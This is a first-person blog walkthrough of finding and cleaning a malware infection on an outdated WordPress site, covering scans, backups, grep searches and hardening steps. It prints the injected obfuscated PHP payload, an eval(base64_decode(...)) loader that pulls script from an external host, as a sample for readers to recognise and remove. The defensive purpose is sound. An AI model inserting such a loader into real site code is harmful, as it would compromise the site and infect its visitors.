Yes, that happened to me. I had a pretty old version of WordPress for one website and it got attacked by somebody. From what I could tell it was an automated attack and it infected most of the .php files for the same user on the hosting.

How I found out about that was when I opened the website in Chrome a warning was shown instead of the website:

 

Note: You can also perform a free scan via Sucuri which will confirm if your website is infected and it also offers ways to clean it up.

The following will be reported if infected:

Don’t panic, investigate!

First thing I did is panic. After panicking for ~5 minutes I realized that I should calm down and start investigating the issue and how many of my websites are affected. I opened all of them in Chrome and only 3 were infected. I opened the source code to see what the code looks like that is causing problems. Note: DO NOT OPEN THE INFECTED LINK, it will infect your machine (especially if you are on Windows).

The code was a path to the infested website enclosed in <script> tags. Nothing was shown in Firefox though, that is why I didn’t see the problem earlier. I assume Firefox has some built-in protection against scripts to external hosts.

Next step was to open the .php files on my server and see the code that is producing the script to the external website. It was on top of the file and it was base64 encoded string, which looked like this:

/**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYJF9TRVJWRV
JbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbkk5Y3VybF83
NzcoJHVybCk50ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl8Nz
coJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9zb2NrBlb
l83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRy2tl
dF83NzcoJHVybCk7aWYoJbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICgIGZ1bmNttr
0aW9uIHRyeWN1cmxKCR1cmwpe2lmKGZas1bmN0aW9uXsf2V4aXN0cygnY3Vybyk9PT1mYWxzZSlyZX
R1cm4gZmFsc2U7JGNoID0gYl0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO
2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICg
VUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZ
XN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR
1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZ
nVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmggsdaefhyjhEgsrrgmV0dXJuI
CRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9
wZW4nKT09PWZhsfaXJldHVybiBmYWxzZTskYndfsdyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgK"));?>

If you are on a Linux machine or have Cygwin installed you can decode the string and see what it actually does by using the following command:

echo "ABOVE STRING GOES HERE" | base64 -d

Echo is used for security so that nothing is executed by mistake.

Make backups

Now that we know what the issue is, make a backup from the website and the database. Don’t worry that the files are still infected, better have infected files than no files at all in case something terrible happens ๐Ÿ™‚

Unless you already have some method to create frequent backups, use simpler method now. Delete all the unwanted themes, plugins, empty cache if using caching plugin, then login to your hosting (S/FTP) and copy all the files from your host to your local machine. Login to your database and create full export of your database schema.

Clean-up

Unless you got Sucuri to perform the cleaning for you, these are some manual steps you can perform to clean your website.

1. Install a plugin to scan

There is a plugin called Exploit Scanner to scan your WordPress installation. It works for WordPress 3.3+ so if you have something older you will need to skip this step. If you have 3.3+, you can install it and perform a scan (in most cases default settings are good) which will inform you which files are (most likely) infected. There will be some legit decode/eval functions in the code, so you should just check for the ones that have base64 encoded strings (like explained above).

When the scan is completed you can see which files are infected and then you manually correct them.

2. Manually scan all the files

If you are on a Linux machine or have Cygwin on Windows you can execute the following to identify which files are infected

cd backedup_folder_from_above
find . | xargs grep -i decode

This will print all the files that have the wordย decode in them, and you will be able to recognize the infection by being on the top of the file with base64 encoded string. If you are not sure for some files, you can always check the encoded string by using the echo method explained above.

3. Manually remove the infected code

Now that we have identified which files are infected (either by the plugin or the manual scan), it is time to clean up the website. Modify the infected files by deleting the malware lines, in the example above from /**/ to php after the encoded string. If you modify the local files on the computer, when you are finished you need to upload them on the server to the correct paths and overwrite the existing ones. Easier way would be to open the files directly from the server (via your FTP client) modify them and save the changes.

When you are done with all the files and they are successfully uploaded on your server, perform another scan with Exploit Scanner and/or manual scan (note: for this second scan you need to create a new backup from the entire website in a new location and scan there). Make sure there are no infected files left.

Final steps

Now that the site is clean there are some final steps that must be performed so that you avoid problems like this in the future.

  1. Update your WordPress installation to the latest version
  2. Update all your plugins or at least the active ones
  3. Update your theme (please note, some themes when updated will overwrite all your custom code)
  4. Change your WordPress secret keys (get them here) in your wp-config.php file (more info here)
  5. Change the passwords for all the users in WordPress and make sure there are no new users created
  6. Change the password(s) on your database and change the password in wp-config.php as well
  7. Make sure the .htaccess file in the root directory of your blog has not been modified. Unless you have modified it, it should look like this
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Note: there could be something else added by your hosting, plugins etc, so double check before modifying it.

After you have done all these steps, go to Sucuri again and Re-Scan your site to make sure that everything is gone. If you are clean you need to get something like this:

That would be all, now go and write some posts on your clean blog ๐Ÿ™‚